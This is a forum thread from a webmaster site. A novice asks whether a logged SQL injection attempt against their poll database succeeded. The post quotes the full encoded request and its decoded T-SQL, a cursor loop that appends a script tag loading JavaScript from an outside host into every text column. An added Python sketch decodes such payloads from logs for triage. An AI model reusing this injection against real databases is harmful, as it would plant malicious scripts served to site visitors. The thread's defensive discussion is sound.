Forum Moderators: brotherhood of lan & mack

SQL injection attempt (php/MySQL) help

Advice needed for cleaning up hacked website

6:54 pm on Aug 10, 2008 (gmt 0)

New User

5+ Year Member

joined:Aug 10, 2008
votes: 0

I have a couple of very simple javascript polls on my site that use MySQL databases to count votes after the user selects an option using a radio button. Today, in our log, I noticed the following, which after researching, seems to be a SQL injection attempt similar to what has been going on lately:

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

(note: I inserted page breaks so the code wouldn't stretch the page)

I translated it to this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I know nothing about php/MySQL other than what I've learned to get the polls working. I used the phpMyAdmin section my webhost provides to check the table structures in the database, and didn't find anything different. Clicking the polls brings up the results just like they should, with no redirects or any other apparent problem.

The SQL is:

SELECT * FROM `revolvepoll_results` WHERE 1

with two fields (candidate and num_votes).

I am wondering if someone can clarify for me whether there is anything else I need to do? I read through the thread in the Databases section but the discussion is too sophisticated for a novice like me.

Thank you for any help you can give.

BTW, I've lurked here a while but forgot the screen name I used to sign up, thus the new sign-up date.

[edited by: mack at 10:29 pm (utc) on Aug. 10, 2008]
[edit reason] removed site url from code just to be safe [/edit]
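
Added example (not part of the original posts): a Python sketch of the "translation" step described in the post above, which pulls the hex string out of a CAST(0x... AS CHAR(4000)) request in an access-log line, decodes it, and reports any script URL it tries to plant and whether it uses SQL Server names such as sysobjects and syscolumns. The sample log line, the injected.example URL and the function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Hex blob wrapped in CAST(0x... AS CHAR/VARCHAR/NVARCHAR(n)), as in the logged request.
CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)", re.I)
# <script src=...> tag that the decoded SQL appends to text columns.
SCRIPT_RE = re.compile(r"<script[^>]*\bsrc=[\"']?([^\"'\s>]+)", re.I)
# Names from the decoded payload that are SQL Server system tables / T-SQL syntax.
TSQL_MARKERS = ("sysobjects", "syscolumns", "@@fetch_status")

def decode_cast_payloads(log_line):
    """Return the decoded SQL text of every hex CAST() in one log line."""
    request = unquote(log_line)            # %20 -> space, etc.
    decoded = []
    for hexstr, sqltype in CAST_RE.findall(request):
        if len(hexstr) % 2:                # odd length: value was cut off in the log
            hexstr = hexstr[:-1]
        raw = bytes.fromhex(hexstr)
        # N(VAR)CHAR payloads are UTF-16LE; CHAR/VARCHAR are single-byte.
        enc = "utf-16-le" if sqltype.upper().startswith("N") else "latin-1"
        decoded.append(raw.decode(enc, errors="replace"))
    return decoded

def triage(log_line):
    """Summarise what a logged request was trying to do."""
    payloads = decode_cast_payloads(log_line)
    text = " ".join(payloads).lower()
    return {
        "payloads": payloads,
        "script_urls": [u for p in payloads for u in SCRIPT_RE.findall(p)],
        "targets_mssql": any(m in text for m in TSQL_MARKERS),
    }

# Constructed, shortened stand-in for the decoded statement (not the real payload).
SAMPLE_SQL = ('DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,'
              'syscolumns b /* shortened */ '
              '<script src="http://injected.example/w.js"></script>'
              ' DEALLOCATE Table_Cursor')
# Constructed log line in the same shape as the one in the post.
SAMPLE_LINE = ('"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
               + SAMPLE_SQL.encode("ascii").hex().upper()
               + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"')

if __name__ == "__main__":
    result = triage(SAMPLE_LINE)
    print(result["script_urls"], "T-SQL names present:", result["targets_mssql"])
```

Any URL it reports is a string to search for in the text columns of your own tables and in your pages' HTML source.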

10:22 pm on Aug 10, 2008 (gmt 0)

Senior Member

WebmasterWorld Senior Member rocknbil is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Nov 28, 2004
votes: 0

Welcome aboard Norksie, have you seen this thread [webmasterworld.com]? Well discussed there.

10:58 pm on Aug 10, 2008 (gmt 0)

New User

5+ Year Member

joined:Aug 10, 2008
votes: 0

Yes, thank you rocknbil, I did read that thread before I posted in this forum, but as I said, it is too sophisticated for my understanding. The responses presume a level of knowledge I don't have, which is why I came to this "newbie" forum hoping for some simplified advice.

Perhaps I can boil down my questions to the fundamentals:

1) If I was able to execute my poll javascript from the webpage where it is located, and nothing happened except the poll results output page was generated, can I be sure the attack failed?

2) If I look at the structure of my table with phpMyAdmin, and it shows nothing more than what I set up, can I be sure nothing was inserted into the table? In other words, would it be obvious if something was there?

I am not a programmer, only a casual webmaster, and I just want to be sure my visitors don't end up with something malicious. Thank you again to anyone who has any input.